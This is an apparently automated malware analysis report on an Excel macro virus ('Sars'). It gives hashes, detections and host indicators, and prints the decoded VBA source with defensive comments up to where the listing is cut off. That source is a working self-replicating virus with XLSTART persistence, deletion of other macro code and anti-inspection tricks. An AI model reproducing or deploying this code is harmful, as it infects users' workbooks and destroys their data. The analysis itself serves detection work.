Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e3885fcde8fe91e…

MALICIOUS

Office (OLE)

37.5 KB Created: 2005-10-20 22:16:36 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: a3cea997fa3d2e5023fcd077c7e392cd SHA-1: 379afcb7caf455b2cfd7afd209d9e5fe09388a58 SHA-256: 3e3885fcde8fe91effac102392ec05d526797f987c2b6a0f761d0db1345e42ba
Risk score: 120

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment

The file is an Excel workbook containing a VBA macro that runs automatically when the document is opened (Auto_Open). ClamAV detects it as Xls.Trojan.Acute-1. The extracted VBA is not obfuscated: it is a plain-text, self-replicating macro virus (self-described in its banner as "Sars", Bandung, Indonesia). The visible code installs itself by saving a copy as Sars.xls in Excel's startup folder (Application.StartupPath, i.e. XLSTART), hides that workbook's window, exports its own module to a file named Wintlb32.dll under Excel's install path and re-imports it into the active workbook after stripping that workbook's other VBA components, rebinds Alt+F8 / Alt+F11 / Alt+F12 to a fake "Visual Basic environment" error, disables Window > Unhide and deletes the Tools > Macro menu, disables Ctrl+Break, re-runs Auto_Open on every sheet activation, and on the 20th of the month shows an "INFECTED BY BUGGIE!" message and advances the system date by a day. The download-and-execute behaviour one might infer from the detection name is not evident in the visible code, which contains no network or shell activity; the listing is cut off at Sub Cr, so the procedures KillStart, SarsWordArt and Cr could not be reviewed and may hold further functionality. Practical host indicators from the visible code: Sars.xls in XLSTART, a text (not PE) file named Wintlb32.dll next to excel.exe, the Excel caption "~~Fakir Meng_", and the misspelled string "could not be intialize".

Heuristics 3

  • ClamAV: Xls.Trojan.Acute-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Acute-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4825 bytes
SHA-256: 97dd7668fd033cf6c4cde38e4679832b9734f738875052b7c95e53b91c8a87ae
Preview script
Preview of the decoded VBA source (up to the first 1,000 lines; this rendering is cut off at Sub Cr — the full 4,825-byte module is the extracted artifact above)
' Decoded VBA attribute headers for the workbook's four document modules
' (ThisWorkbook, Sheet1..Sheet3). None of them carries any code in this
' listing; all malicious logic lives in the standard module "Sars" below.
' The VB_Base GUIDs appear to be the standard Excel Workbook ({00020819-...})
' and Worksheet ({00020820-...}) class IDs, i.e. nothing unusual here.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sars"
'   Sars virus!
'   Bandung, Indonesian
'   Tonk sok Sars nyieunan macro, lah...
'
' Standard module holding the whole virus. The three lines above are the
' author's original banner, kept verbatim as an attribution artifact; the
' third appears to be Sundanese (Bandung dialect), roughly "don't keep having
' Sars make macros, lah...".
' Micro: the module/virus name; Auto_Open uses it to locate, export and
' re-import this very component by name.
Public Const Micro = "Sars"
' Data0: file name of the copy dropped into Excel's startup folder ("Sars.xls").
Public Const Data0 = Micro & ".xls"
' Data1: text of the fake VBE error that Sub Cr displays when the user presses
' one of the hijacked macro/VB-editor shortcuts. The misspelling "intialize" is
' part of the original string and is a reliable hunting/detection string.
Public Const Data1 = "The Visual Basic environment could not be intialize. Please run setup to install it correctly."
Sub CkAgain()
Attribute CkAgain.VB_ProcData.VB_Invoke_Func = " \n14"
' Empty stub called once from Auto_Open: declares two locals it never uses,
' enables error suppression and returns. Presumably a remnant of removed or
' never-finished code -- it has no effect.
Dim bg          As Object
Dim po          As Object

On Error Resume Next


End Sub
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
' Entry point: Excel runs Auto_Open when the workbook is opened, and the
' OnSheetActivate hook set below re-invokes it on every sheet switch once the
' virus is installed. Everything visible here is persistence, replication into
' the active workbook, and hiding from the user; no network, download or shell
' activity appears in this procedure.
' NOTE(review): KillStart, SarsWordArt and Cr are referenced but their bodies
' are outside (or cut off at the end of) this listing, so their behaviour is
' unverified.
    Dim Ct                  As Object
    Dim bg                  As Object
    Dim bgc                 As Object
    Dim bck                 As Object
    Dim xlsz                As Object
    Dim Ck                  As Boolean
    
' Every runtime error is swallowed, so any step below may fail silently -- e.g.
' the VBProject calls when access to the VBA project object model is not trusted.
On Error Resume Next
' Procedure not present in the visible listing.
KillStart
With Application
     ' A is never declared in the visible code and both branches set the same
     ' caption, so the condition is meaningless; net effect is retitling Excel.
     If WeekDay(Now) Mod 2 = A Then
        .Caption = "~~Fakir Meng_"
     Else
        .Caption = "~~Fakir Meng_"
     End If
     ' Makes sure an "Xlstart" folder exists under Application.Path (Excel's
     ' install directory).
     If Dir(.Path & "\Xlstart") = "" Then MkDir .Path & "\Xlstart"
     ' Payload on the 20th of any month: shows a message box, then advances the
     ' system clock by one day (the VBA Date statement sets the system date).
     If Day(Date) = 20 Then
        MsgBox "UPDATE ME NOW, INFECTED BY BUGGIE!", 48, Micro
        Date = Now + 1
     End If
     ' Hide the following UI changes and block Ctrl+Break interruption.
     .ScreenUpdating = False
     .EnableCancelKey = xlDisabled
     ' On even-numbered days, schedules SarsWordArt (not visible here) via OnTime.
     If Day(Date) Mod 2 = 0 Then
        .OnTime Now + TimeValue("1"), "SarsWordArt"
     End If
     ' Persistence: saves a copy as Sars.xls in Application.StartupPath, the
     ' XLSTART folder whose workbooks Excel opens -- running this macro -- at
     ' every launch.
     If Dir(.StartupPath & "\" & Data0) = "" Then
        ActiveWorkbook.SaveAs .StartupPath & "\" & Data0
     End If
     ' If the only open workbook is the dropped Sars.xls, adds a blank workbook
     ' captioned "Book1" so the session looks like a normal new-workbook start.
     If Workbooks.Count = 1 And .Workbooks(1).Name = Data0 Then
        Workbooks.Add: ActiveWorkbook.Windows(1).Caption = "Book1"
     End If
        ' bg is the workbook that will be infected below.
        Set bg = ActiveWorkbook
        ' Anti-analysis: Alt+F12, Alt+F8 (Macros dialog) and Alt+F11 (VB editor)
        ' are redirected to Sars.Cr, whose visible start is a MsgBox of Data1
        ' (the fake "Visual Basic environment" error).
        .OnKey "%{F12}", "Sars.Cr"
        .OnKey "%{F8}", "Sars.Cr"
        .OnKey "%{F11}", "Sars.Cr"
        ' Removes the UI paths that would reveal the hidden workbook or the macro.
        .CommandBars("Window").Controls("Unhide...").Enabled = False
        .CommandBars("Tools").Controls("Macro").Delete
     ' Re-runs this procedure from Sars.xls whenever any sheet is activated.
     .OnSheetActivate = "Sars.xls!auto_Open"
     ' Keeps the dropped workbook's window invisible.
     Workbooks(Data0).Windows.Item(1).Visible = False
     
     ' No-op stub (see CkAgain).
     CkAgain
     ' Drops the "Sars" module's source as Wintlb32.dll next to excel.exe. Despite
     ' the name this is exported VBA text, not a PE file -- a useful host IOC.
     If Dir(.Path & "\Wintlb32.dll") = "" Then
               Workbooks(Data0).VBProject.VBComponents(Micro).Export .Path & "\Wintlb32.dll"
     End If
     
        ' Strips the active workbook's VBA project: every component whose Type is
        ' not 100 (i.e. not a document module) and whose name is not "Sars" is
        ' removed, and document modules (Type 100, vbext_ct_Document: ThisWorkbook /
        ' Sheet objects) have all their code lines deleted. boom is undeclared.
        For Each boom In bg.VBProject.VBComponents
             If boom.Type <> 100 Then
                If boom.Name <> Micro Then
                   bg.VBProject.VBComponents.Remove boom
                End If
             Else
                Set bck = boom.codemodule
                If bck.CountOflines <> 0 Then bck.Deletelines 1, bck.CountOflines
             End If
         Next boom
     
     ' Ck becomes True if the active workbook already carries the "Sars" module.
     For Each xlsz In bg.VBProject.VBComponents
         If xlsz.Name = Micro Then Ck = True: Exit For
     Next xlsz
     
     ' Infection: imports the dropped module into the active workbook, deletes the
     ' drop file, saves Sars.xls, and saves the host workbook only if it already
     ' has a path (FullName contains a backslash), so unsaved new books are left
     ' alone until the user saves them.
     If Ck = False Then
        Set Ct = bg.VBProject.VBComponents
               Ct.Import .Path & "\Wintlb32.dll"
               Kill .Path & "\Wintlb32.dll"
               Workbooks(Data0).Save
               If InStr(1, bg.FullName, "\") Then ActiveWorkbook.Save
     End If
     
End With
End Sub
Sub Cr(): MsgBox Data1, 16, "Microsoft Visual Ba
... (truncated)